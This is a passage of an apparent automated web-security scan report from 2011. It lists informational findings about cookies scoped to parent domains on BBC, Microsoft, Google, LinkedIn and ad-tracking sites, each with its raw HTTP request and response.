GET /b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430?AQB=1&ndh=1&t=3/4/2011%2013%3A26%3A30%202%20300&ns=deliveryagent&pageName=NBC%20Universal%20Store%3AFeatured%20Offers%3AWilliam%20%26amp%3B%20Catherine%20Royal%20Wedding%20DVD%3ADetail&g=http%3A//www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&r=http%3A//www.nbcuniversalstore.com/&cc=USD&events=prodView%2Cevent3&products=%3B298028&c1=NBC%20Universal%20Store%3AFeatured%20Offers&c2=NBC%20Universal%20Store%3AFeatured%20Offers&c3=NBC%20Universal%20Store%3AFeatured%20Offers&v3=browse&c4=NBC%20Universal%20Store%3AFeatured%20Offers&c5=Detail&c6=NBC%20Universal%20Store&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=852&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.seenon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:33:22 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E00211051D3F5C-6000012880291077[CE]; Expires=Sun, 1 May 2016 13:33:22 GMT; Domain=.seenon.com; Path=/
Location: http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430?AQB=1&pccr=true&vidn=26E00211051D3F5C-6000012880291077&&ndh=1&t=3/4/2011%2013%3A26%3A30%202%20300&ns=deliveryagent&pageName=NBC%20Universal%20Store%3AFeatured%20Offers%3AWilliam%20%26amp%3B%20Catherine%20Royal%20Wedding%20DVD%3ADetail&g=http%3A//www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php%3Fp%3D298028%26v%3Dnbcu_featured-products&r=http%3A//www.nbcuniversalstore.com/&cc=USD&events=prodView%2Cevent3&products=%3B298028&c1=NBC%20Universal%20Store%3AFeatured%20Offers&c2=NBC%20Universal%20Store%3AFeatured%20Offers&c3=NBC%20Universal%20Store%3AFeatured%20Offers&v3=browse&c4=NBC%20Universal%20Store%3AFeatured%20Offers&c5=Detail&c6=NBC%20Universal%20Store&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1021&bh=852&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 02 May 2011 13:33:22 GMT
Last-Modified: Wed, 04 May 2011 13:33:22 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www268
Content-Length: 0
Content-Type: text/plain


15.24. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/help/rss/4498287.stm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/hi/help/rss/4498287.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:14 GMT
Location: http://www.bbc.co.uk/terms/additional_rss.shtml
Keep-Alive: timeout=10, max=785
Expires: Tue, 03 May 2011 13:24:14 GMT
Connection: close
Set-Cookie: BBC-UID=846d2cd000a14f9e3e974970f1afb353a9de9c63b0a091794bfba34fd754ca480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 255

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/te
...[SNIP]...

15.25. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /earth/hi/earth_news/newsid_9469000/9469456.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:23 GMT
Keep-Alive: timeout=10, max=797
Expires: Tue, 03 May 2011 13:24:23 GMT
Connection: close
Set-Cookie: BBC-UID=045dbce0a042c0970d04923c215c459e7213a490607001493bbb322c2d655fdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=045dbce0a042c0970d04923c215c459e7213a490607001493bbb322c2d655fdc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43768

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...

15.26. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:16 GMT
Location: http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm
Keep-Alive: timeout=10, max=793
Expires: Tue, 03 May 2011 13:24:16 GMT
Connection: close
Set-Cookie: BBC-UID=14eddcb01022a0f0cdd9e94f21d48d3e44053bf8b0d0b119db3ba39e6e7bac4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 252

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://news.bbc.co.uk/earth/hi/earth_news/newsi
...[SNIP]...

15.27. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cricket/13264093.stm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/sport2/hi/cricket/13264093.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:19 GMT
Location: http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm
Keep-Alive: timeout=10, max=779
Expires: Tue, 03 May 2011 13:24:19 GMT
Connection: close
Set-Cookie: BBC-UID=140d4ce0b0f21053aeb14117a15017094931c25ec030a1091b6b324a9f11dfc80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:19 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://news.bbc.co.uk/sport2/hi/cricket/1326409
...[SNIP]...

15.28. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/13265403.stm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/sport2/hi/football/13265403.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:18 GMT
Location: http://news.bbc.co.uk/sport2/hi/football/13265403.stm
Keep-Alive: timeout=10, max=767
Expires: Tue, 03 May 2011 13:24:18 GMT
Connection: close
Set-Cookie: BBC-UID=d40dbc10101250025d522e4a41d8b8f763c35633e03001593b3b32ea26ecf4e60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 237

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://news.bbc.co.uk/sport2/hi/football/132654
...[SNIP]...

15.29. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: max-age=0
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 13:24:19 GMT
Location: http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm
Keep-Alive: timeout=10, max=786
Expires: Tue, 03 May 2011 13:24:19 GMT
Connection: close
Set-Cookie: BBC-UID=246dece020322093fde3b25401e635077e338bfed070816ab42b8ad5ff713c260Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:19 GMT; path=/; domain=bbc.co.uk;
Content-Length: 240

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://news.bbc.co.uk/sport2/hi/formula_one/132
...[SNIP]...

15.30. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/13264093.stm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sport2/hi/cricket/13264093.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:24 GMT
Keep-Alive: timeout=10, max=792
Expires: Tue, 03 May 2011 13:24:24 GMT
Connection: close
Set-Cookie: BBC-UID=34cd4c40409250f8085ec3c921c41698c30a233970c08233975d83f5e6c1d5460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34cd4c40409250f8085ec3c921c41698c30a233970c08233975d83f5e6c1d5460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 50048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...

15.31. http://news.bbc.co.uk/sport2/hi/football/13265403.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/13265403.stm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sport2/hi/football/13265403.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:24 GMT
Keep-Alive: timeout=10, max=800
Expires: Tue, 03 May 2011 13:24:24 GMT
Connection: close
Set-Cookie: BBC-UID=643d9c10a0c2d0e8ac0f3690915614f23faa777440c021292beb63de88eda35a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=643d9c10a0c2d0e8ac0f3690915614f23faa777440c021292beb63de88eda35a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...

15.32. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/formula_one/13267766.stm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sport2/hi/formula_one/13267766.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:26 GMT
Keep-Alive: timeout=10, max=795
Expires: Tue, 03 May 2011 13:24:26 GMT
Connection: close
Set-Cookie: BBC-UID=64cd0c50202200caeed98baf71322f665e5ca9bb10f0c18a64cbfae4b0dcf6520Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:26 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64cd0c50202200caeed98baf71322f665e5ca9bb10f0c18a64cbfae4b0dcf6520Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:26 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...

15.33. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808506.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/bing/ff808506.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAADwBwAA5EE5dH9H4z1ekNaveklkZg!!&M=1; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:11 GMT; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:11 GMT; path=/
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 03-May-2041 13:23:11 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:23:11 GMT
Content-Length: 34326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Explore the
...[SNIP]...

15.34. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/bing/ff808535.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: A=I&I=AxUFAAAAAADoBwAAQxKyg25PAhSZatiXmLSAdw!!&M=1; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:17 GMT; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Fri, 03-May-2041 13:23:17 GMT; path=/
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/; expires=Fri, 03-May-2041 13:23:17 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:23:16 GMT
Content-Length: 37037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Bing Help
<
...[SNIP]...

15.35. http://picasaweb.google.com/lh/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /lh/view

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lh/view HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Expires: Tue, 03 May 2011 13:23:21 GMT
Date: Tue, 03 May 2011 13:23:21 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=0050eL6sHffl; Path=/; HttpOnly
Set-Cookie: S=photos_html=KKkdy6Ss4hjGE2VvyHjHaw; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8"></meta>
<title>404 NOT_FOUND</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A
...[SNIP]...

15.36. http://pixel.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dc048d9159e4ae3 HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102301%3Ats%3D1304431102301; Domain=.33across.com; Expires=Wed, 02-May-2012 13:58:22 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Tue, 03 May 2011 13:58:21 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

15.37. http://th.linkedin.com/in/narongchai  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://th.linkedin.com
Path:   /in/narongchai

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /in/narongchai HTTP/1.1
Host: th.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _lipt=deleteMe; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:0914326324168300109"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:UvLCachlIU-Sw1chSdL-OsHxAUVtCbInth04RtWljKGt6M_FfhDx0w:1304429233:128b7631ce6fae821c3883417c1efbc688b51624"; Version=1; Max-Age=1799; Expires=Tue, 03-May-2011 13:57:12 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Sun, 21-May-2079 16:41:20 GMT; Path=/
Set-Cookie: bcookie="v=1&0e90019a-e852-4952-934f-d122b3a07be8"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Sun, 21-May-2079 16:41:20 GMT; Path=/
Last-Modified: Mon, 25 Apr 2011 08:41:54 GMT
Set-Cookie: bcookie=0bbc3d87-a199-4a56-a702-02cda34c0373; Domain=linkedin.com; Expires=Sun, 21-May-2079 16:41:21 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 03 May 2011 13:27:14 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta name="descr
...[SNIP]...

15.38. http://translate.google.com/translate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:27:39 GMT
Expires: Tue, 03 May 2011 13:27:39 GMT
Cache-Control: private, max-age=86400
Location: http://translate.google.com/?hl=en
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=3330647f26744aa8:TM=1304429259:LM=1304429259:S=9wsa5oHcPuKVLX4W; expires=Thu, 02-May-2013 13:27:39 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
Content-Length: 0
X-XSS-Protection: 1; mode=block
Connection: close


15.39. http://translate.google.com/translate_t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_t

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_t?q=barkley+bank&um=1&ie=UTF-8&sa=N&hl=en&tab=wT HTTP/1.1
Host: translate.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:26 GMT
Expires: Tue, 03 May 2011 13:27:26 GMT
Cache-Control: private, max-age=86400
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=71e2231686a4df92:TM=1304429246:LM=1304429246:S=UZVNqCuXSydjzUQK; expires=Thu, 02-May-2013 13:27:26 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"><meta name=keywords content="translate, translations, translation, translator, machine translation, online
...[SNIP]...

15.40. http://video.google.com/videoplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.google.com
Path:   /videoplay

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videoplay HTTP/1.1
Host: video.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 13:28:07 GMT
Expires: Tue, 03 May 2011 13:28:07 GMT
Cache-Control: private, max-age=0
Set-Cookie: PREF=ID=47ea04eb3a7be0ea:TM=1304429287:LM=1304429287:S=HUtDMBVo-KZ106-O; expires=Thu, 02-May-2013 13:28:07 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: VSFE_1.0
X-XSS-Protection: 1; mode=block
Connection: close


